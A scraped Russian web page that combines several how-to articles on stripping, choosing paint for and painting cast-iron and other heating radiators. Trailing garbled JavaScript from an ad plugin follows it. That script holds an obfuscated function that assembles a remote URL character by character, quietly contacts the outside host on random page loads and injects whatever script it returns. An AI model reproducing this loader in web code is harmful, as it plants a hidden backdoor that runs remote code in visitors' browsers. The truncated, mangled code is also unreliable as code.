Если на изделии имеются трещины, неровности, сколы, которые необходимо скрыть, придется их зашпаклевать. Лучше всего использовать автомобильную шпатлевку. После устранения дефектов еще раз протрите поверхность и обработайте грунтовочным составом.

Шпаклюем неровности

Выбираем краску

Этот этап является не менее важным, чем подготовка и сама покраска батарей. Поэтому прежде чем красить чугунные батареи отопления необходимо правильно выбрать материал. Он должен обладать рядом качеств, которые в дальнейшем станут залогом безопасности, красоты и долговечности.

Итак, выбор необходимо делать с учетом следующих критериев:

  • Краска должна быть устойчивой к высоким температурам. В связи с тем, что в период отопительного сезона чугунные батареи будут сильно нагреваться, их нужно покрывать материалом, который не потеряет свои характеристики под воздействием высокой температуры. В противном случае после первого отопительного сезона придется красить снова. Нужно приобретать только ту краску, которая способна выдерживать температуру не ниже 100 градусов.
  • Устойчивость к истиранию и другим механическим воздействиям. Так как отопительные коммуникации обычно выполняют еще и функцию пылесборников, их приходится часто чистить. Поэтому важно, чтобы покрытие не стерлось после десятка уборок.
  • Отсутствие вредных компонентов в составе. Чтобы предотвратить выделение вредных для человеческого организма веществ, необходимо красить батареи материалом, который их не содержит или содержит в наименьшем количестве. Если в краске их много, то при нагревании радиатора или его чистке вредные компоненты будут выделяться воздух, что не лучшим образом повлияет на самочувствие всех проживающих в квартире.

Красим батарею

Виды материалов

В основном для окрашивания элементов отопления используют такие краски:

  • алкидные;
  • масляные;
  • акриловые;
  • водно-дисперсионные.

Все они имеют свои преимущества и недостатки, учитывая которые каждый выбирает наиболее подходящий вариант.

Выбираем краску для батарей

Алкидная краска славится прочностью, устойчивостью к истиранию и другим механическим воздействиям, но имеет неприятный запах. Спросом пользуется за счет большого выбора цветов и оттенков. При нанесении на поверхность добиться однородного тона очень просто.

Масляная имеет неприятный запах и долго сохнет в сравнении с другими видами. Во время покраски возникают сложности с равномерным нанесением ее на поверхность.

Акриловые материалы могут похвастаться привлекательным глянцевым внешним видом и устойчивостью к истиранию. Основным недостатком ее является неприятный запах, который приходится выветривать в течение длительного отрезка времени. Причиной этому служит наличие в ее составе растворителя.

Водно-дисперсионные краски не воняют, быстро высыхают, но не так сопротивляются истиранию. Они не пользуются популярностью, так как окрашенная поверхность получается матовой и немного шершавой. Выбор водно-дисперсионных красок, подходящих для металла и в то же время термостойких, невелик.

Виды материалов для окрашивания батареи

Приобрести краску можно в банке или аэрозольном баллончике.

При выборе цвета некоторые покупатели отдают предпочтение темным краскам, руководствуясь мнением, что они больше чем светлые подходят для радиаторов отопления.

В этом огромную роль играет не только желание добавить в интерьер своеобразную изюминку, но и суждения о том, что темные радиаторы отдают больше тепла, чем светлые. С точки зрения законов физики – это действительно так. Но насколько существенна будет разница в температурах нужно проверять на практике.

Важно

Почему бы и не попробовать поработать своими руками с темной краской. Если окрашенное изделие удачно впишется в интерьер, то это придаст квартире характер и оригинальность.

Выбираем цвет краски для батареи

Есть момент, в котором светлые тона явно уступают не в теории, а на практике. Так почему же батареи отопления лучше покрывать темной краской? Дело в том, что с течением времени белое покрытие постепенно желтеет. В связи с этим его нужно обновлять чаще.

Белая краска на батарее пожелтела

Рекомендации по покраске

Перед тем как покрасить батареи отопления своими руками должна выполняться с соблюдением определенных правил. Это обеспечит хороший конечный результат.

  • Закройте поверхности, которые не собираетесь окрашивать пленкой или газетой. Чтобы закрепить на стене используйте малярную ленту.
  • Нельзя красить нагретые батареи отопления. Неприятный запах будет выделяться более интенсивно и увеличится риск растрескивания покрытия.
  • Лучше начинать красить сверху, так как капли могут стекать на покрытые места, что будет некрасиво. Также будет труднее добиться ровного слоя.
  • Красить своими руками рекомендуется начинать с труднодоступных мест, чтобы не испачкаться в процессе работы.
  • Профессионалы рекомендуют наносить несколько тонких слоев краски, а не один щедрый. Так будет проще добиться однородного тона. Также это внесет свою лепту в качество теплоотдачи. Следующим слоем нужно покрывать радиатор отопления только после полного высыхания предыдущего.

Этапы окрашивания батареи отопления

Если батарея уже установлена на свое место, то проще будет работать небольшими валиками или прямыми и изогнутыми кисточками. Использовать в таком случае краскопульт будет неудобно. Могут возникнуть сложности с нанесением равномерного слоя при покраске задней стороны изделия.

Радиаторная кисть

Снятую или еще не установленную батарею лучше красить с аэрозольного баллончика или краскопульта, что позволит уменьшить временные затраты.

Покраска батареи аэрозольным баллончиком

Покраска батарей отопления своими руками является достаточно трудоемким и ответственным процессом. Этот процесс не терпит ошибок и игнорирования важных моментов. Только соблюдая все рекомендации специалистов, вы сможете выполнить обновление тепловых коммуникаций качественно и креативно.

Фотогалерея (14 фото)

25.11.2016

Источник: http://gopb.ru/radiatory/kak-pokrasit-batarei-otopleniya-svoimi-rukami/

Как покрасить батарею отопления своими руками? – Дизайн и Дом

Радиаторы отопления необязательно должны быть безликими и выкрашенными в традиционный бело-серый цвет. Батареи можно оформить в любом стиле. Самый доступный по цене способ преображения радиаторов – покрытие краской.

Но это отнюдь не самый легкий вариант, ведь для того, чтобы качественно покрасить батареи, нужно выполнить немало манипуляций: очистить радиатор от старого покрытия, обезжирить ее поверхность, выбрать подходящую краску и только потом – наносить облицовочный материал.

Очищаем и обезжириваем батарею

Для снятия краски с поверхности батареи не рекомендуется использовать такие традиционные варианты, как проволочные щетки, паяльная лампа и термофен. В первом и втором случае есть большой риск повреждения металлической основы батареи.

А третий способ абсолютно неэффективен, так как металл быстро отводит тепло. Именно поэтому наиболее рационально использовать специальные химические смывки.

Конечно, и этот вариант имеет немало недостатков, но зато он максимально эффективный.

Смывка действует следующим образом: жидкость, впитываясь в краску, размягчает покрытие, после чего его можно быстро устранить при помощи простого металлического скребка или шпателя. В составе смывок содержатся агрессивные химические вещества, которые разрушают только краску, не нанося вреда металлу.

Наличие токсичных компонентов обуславливает некоторые правила применения смывки.

  • Во-первых, перед удалением краски, нужно открыть в помещении все окна, чтобы обеспечить активную циркуляцию воздуха.
  • Во-вторых, наносить смывку желательно деревянным или металлическим инструментом, так как пластиковый прибор может повредиться.
  • В-третьих, необходимо работать в защитных перчатках.
  • И, в-четвертых, после удаления краски нужно несколько часов проветривать комнату.

После удаления краски зашкурьте места с ржавчиной и начинайте обезжиривать радиатор. Поверхность можно обработать уайт-спиритом или слабощелочным раствором. Поверх обезжиривающего слоя рекомендуется нанести антикоррозийную грунтовку.

Выбираем краску

При выборе краски для батареи нужно, в первую очередь, обращать внимание на ее термостойкость — она должна быть предназначена для поверхностей, которые постоянно поддаются воздействию высокой температуры. Также краска должна быть устойчивой к механическому истиранию. В ее составе не должно быть токсических компонентов. Для покраски батарей отопления наиболее подходят следующие типы красок:

  • Акриловые — долговечные краски, придающие поверхности батареи приятный глянцевый блеск. Весте с тем, они изготавливаются с использованием органических растворителей, поэтому высыхание отделки сопровождается выделением характерного не очень приятного запаха.
  • Алкидные — доступные по цене краски, отличающиеся высокой устойчивостью к истиранию. Представлены в широком цветовом ассортименте. Недостаток краски — неприятный запах, сохраняющийся даже несколько дней после высыхания.
  • Водно-дисперсионные — краски, не имеющего никакого специфического запаха. Такая облицовка очень быстро высыхает. Весте с тем, на упаковке краски обязательно должна присутствовать маркировка, подтверждающая, что продукт предназначен для батарей, иначе облицовка не выдержит воздействия высоких температур.

Приступаем к покраске

Красить можно только холодные радиаторы. Если батареи будут горячими или даже теплыми, облицовка покроется пятнами. К тому же, из-за того, что под воздействием температуры участки радиатора будут высыхать в разное время, поверхностьполучится разных оттенков. Наносить краску можно как кисточкой, так и краскопультом.

Начинайте красить с верхней части батареи, постепенно двигаясь к нижней. Для удобства наносите облицовку сначала на внутренние перекрытия, а затем — наружные. Красьте в два тонких слоя, ведь так покрытие будет более гладким и равномерным. После завершения покраски дайте радиатору полностью высохнуть.

Источник: http://rumpus.ru/remont/kak-pokrasit-batareyu-otopleniya-svoimi-rukami/

Как покрасить батарею отопления своими руками: выбор краски, расчет площади чугунных радиаторов (видео)

Перед тем как покрасить батарею отопления, внешний вид которой пришел в негодность или не соответствует общему дизайну интерьера, необходимо уделить должное внимание выбору краски. Хотя в продаже имеется широкий ассортимент красящих составов, не каждый из них подойдет для этого процесса. К тому же существуют различные технологии, позволяющие получить нужный результат.

Какие батареи можно окрашивать?

Покраска стационарных обогревательных элементов – это ответственный процесс, от правильности выполнения всех действий зависит не только внешний вид, но и обогрев комнаты. Именно поэтому следует учитывать рекомендации специалистов, которые позволят качественно провести работы.

Радиаторы подразделяются на виды в зависимости от материала, используемого для их изготовления.

  1. Алюминиевые и биметаллические обогревательные элементы. Это современная разновидность, проходящая тщательную обработку порошковой краской на предприятии. С ее помощью удается получить надежное и долговечное покрытие, которое практически не повреждается со временем. Чаще всего вопрос о перекраске возникает из-за желания изменить внешний вид изделия. Но снять слой в домашних условиях без повреждения конструкции – задача трудновыполнимая. Если же укладывать новый красящий состав на старую поверхность, то качественного результата добиться очень трудно. Кроме того, это приведет к заметному снижению теплоотдачи, поэтому такие приборы рекомендуется закрывать специальными экранами.Алюминиевые радиаторы отопления
  2. Пластинчатый радиатор. Такой вариант встречается заметно реже, его используют для зданий, в которых сеть испытывает серьезное давление. Конструкция этого изделия состоит из множества близко расположенных пластинок и имеет большую площадь. Именно из-за этого провести покраску очень трудно. Практика показывает, что добиться приемлемого результата можно лишь при снятии элемента со своего места и тщательной его очистки. Нанесение состава осуществляется с помощью краскопульта или баллончика. При этом окраске подвергаются только внешние детали.Пластинчатый тип батареи
  3. Чугунная батарея. Именно чугун больше всего подходит для того, чтобы реализовать интересные дизайнерские решения. Такой элемент отопления хорошо окрашивается различными составами. Очень важно, что нанесенное покрытие не снижает уровень теплообмена.Чугунная батарея отопления
  4. Панельные изделия. Для получения желаемого результата в качестве красящего инструмента применяются распыляющиеся варианты.Панельный радиатор

Особенности выбора красящего состава

При выборе подходящего для батарей отопления материала необходимо особенно пристальное внимание уделять его свойствам:

  • Термостойкость. Это основной параметр, на который ориентируются при приобретении. Получаемое покрытие должно выдерживать температуру больше 100 градусов. При этом нет необходимости выбирать огнеупорные растворы, применяемые для работы с поверхностями печей и каминов.

Одна из обязательных характеристик краски для батареи – это термостойкость

  • Назначение. Естественно, краска должна быть по металлу. Другие смеси (в том числе универсальные) для этого мероприятия не подходят.
  • Высокая износостойкость.

Состав (независимо от вида) может использоваться только при наличии всех этих факторов.

Какой краской красят радиаторы?

Можно выделить достаточное количество продукции, которая подойдет для выполнения работы.

Алкидные эмали

Такой вариант считается традиционным при окраске металлических нагревательных элементов. Смесь обладает следующими достоинствами:

  1. Низкая стоимость. Доступность материала объясняет ее популярность.
  2. Простота нанесения. Раствор отлично подходит для чугунных радиаторов и не нуждается в предварительном грунтовании.
  3. Широкий декоративный диапазон. В продаже встречаются краски разных оттенков, которые успешно смешиваются. Также существуют колеры.

Алкидная эмаль – это доступный вид лакокрасочного материала, окрашивание которым рекомендуют производить в период отключения отопления

Не лишена продукция и недостатков:

  • Стойкий запах. Полное выветривание происходит только после окончательного высыхания покрытия.
  • Изменение цвета по прошествии времени. Постепенно из-за высокой температуры поверхность может приобретать белесый или желтоватый оттенок.

Масляная краска

Эта разновидность по-прежнему встречается в продаже, хотя востребованность ее невелика. Это объясняется массой отрицательных свойств, которыми обладает материал. Особенно выделяется длительный период высыхания и едкий запах, который оказывает токсическое воздействие. Такие составы используются только в случаях отсутствия альтернативы.

Несмотря на явные минусы масляной краски, все же плюс у этого покрытия есть, он заключается в высоких эксплуатационных свойствах

Водоэмульсионная разновидность

Этот вид красящей продукции, а точнее его полимерная разновидность, считается новым. Именно поэтому возникает вопрос: можно ли красить батареи водоэмульсионной краской?

Водно-дисперсионная краска Dulux

Да, такой состав применяется для работы с элементами отопления, но при всех положительных качествах (долговечность, экологичность, легкость укладки, отсутствие едкого запаха) продукция имеет определенные условия использования. Они таковы:

  1. Акриловый вариант является наиболее приемлемой разновидностью.
  2. Чтобы качественно покрасить изделие, лучше применять краскопульт. При ручном окрашивании следует избегать чрезмерного разбавления водой.
  3. Основа обязательно обрабатывается антикоррозийными составами и грунтуется.

Нанесение водоэмульсионки краскопультом позволяет равномерно покрасить все элементы радиатора отопления

Серебрянка

Такая разновидность считается классикой, но используется редко. Это объясняется тем, что поверхность приобретает металлический (серебряный или алюминиевый) цвет. Состав можно сделать самостоятельно или купить готовый. Основу смеси составляет алюминиевая пудра.

Радиатор, покрашенный серебрянкой

Дорогой, но качественной альтернативой является силиконоалюминиевая краска. Она имеет нужные параметры и создает слой, который не подвергается растрескиванию при температурном расширении.

Нюансы при окрашивании радиаторов

Для получения желаемого результата следует учитывать ряд нюансов:

  • Работы лучше начинать до начала отопительного сезона, поскольку горячие детали нельзя красить. К тому же это позволит без проблем снять элемент обогрева. Сложнее ситуация в старых домах, где подача воды централизованная и нет перекрывающих кранов. Зимой выключить радиаторы из общей системы оказывается невозможным.
  • Если предполагается снятие батарей, то лучше сразу провести их промывку. Особенно если обогревательный элемент чугунный.
  • При снятии старой краски нельзя применять термический метод, предполагающий использование газовой горелки или паяльной лампы.

Снять старую краску с батареи можно при помощи специальной смывки или механическим способом, используя для этого электроинструмент и наждачную бумагу

Такие нехитрые советы позволят избежать проблем в дальнейшем.

Покраска радиаторов отопления

Окраска батарей своими руками происходит поэтапно, что позволяет выполнить все действия правильно.

Подготовка инструмента

В зависимости от выбранного метода нанесения для работы потребуется следующее:

  • Кисточки разного размера. Обязательно иметь слегка изогнутый инструмент на длинной ручке.
  • Валик. Применяется редко, преимущественно для панельных элементов отопления.
  • Краскопульт. Отличный вариант, но для достижения качественного результата батарея должна быть снята.
  • Средство или приспособление для чистки деталей от старой краски и ржавчины. Это может быть наждачная бумага, дрель с насадкой или специальная смывка.
  • Растворитель и ветошь. Если потребуется удалить излишки или брызги.
  • Емкость для красящего состава.

Инструменты и материалы для окрашивания

Все должно быть подготовлено заранее.

Расчет площади батареи

Особенно тщательно высчитывается площадь окраски чугунного радиатора, это необходимо для определения нужного количества материала.

  1. Измеряется внешняя сторона одной секции.
  2. Чугунный радиатор часто называется «гармошка», поскольку имеет одинаковые фрагменты. Поэтому полученный результат умножается на 4 и на количество секций.
  3. К получившемуся значению прибавляется 15%.

В инструкции к современным обогревателям часто уже указана площадь.

Подготовка поверхности

Подготовка основания включается в себя следующие этапы:

  1. Проводится очистка поверхности наиболее подходящим способом. Детали тщательно промываются и вытираются.
  2. Подготавливается место для работы. Если снять элемент нельзя, то смежные участки закрываются, чтобы избежать попадания краски.
  3. Особое внимание уделяется ржавчине – ее счищают полностью.
  4. Если требуется, поверхность обрабатывается антикоррозийными смесями и грунтуется. Это актуально для чугунных изделий при использовании акрилового состава.

Этапы подготовки радиатора к окрашиванию

При проведении работ в зимний период должна быть возможность отключения от общей системы отопления.

Окрашивание

Покраску батарей в квартире проводят разными способами:

  • Чугунные радиаторы обрабатываются кисточкой. Это традиционный метод. Технология проста и заключается в том, что первыми покрываются труднодоступные места и внутренние участки. При этом краски не должно быть много, чтобы избежать потеков. Далее состав наносится на лицевую часть. После высыхания первого слоя укладывается второй.
  • Применение краскопульта. Принцип схож с предыдущим вариантом: работы начинаются с внутренних мест, постепенно переходят на лицевые участки. Расстояние должно быть одинаковым, без сильного приближения. Лучше выполнять зигзагообразные движения сверху вниз и обратно. Труднодоступные места подкрашиваются кисточкой.
  • Использование аэрозолей. Технология повторяет работу с краскопультом, только баллончик требуется хорошо встряхнуть.

Красивой поверхности удается добиться, если проявить фантазию и немного отойти от стандартных вариантов.

Источник: http://OtdelkaGid.ru/raboty/pokraska-pobelka/radiatorov-otopleniya-svoimi-rukami.html

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};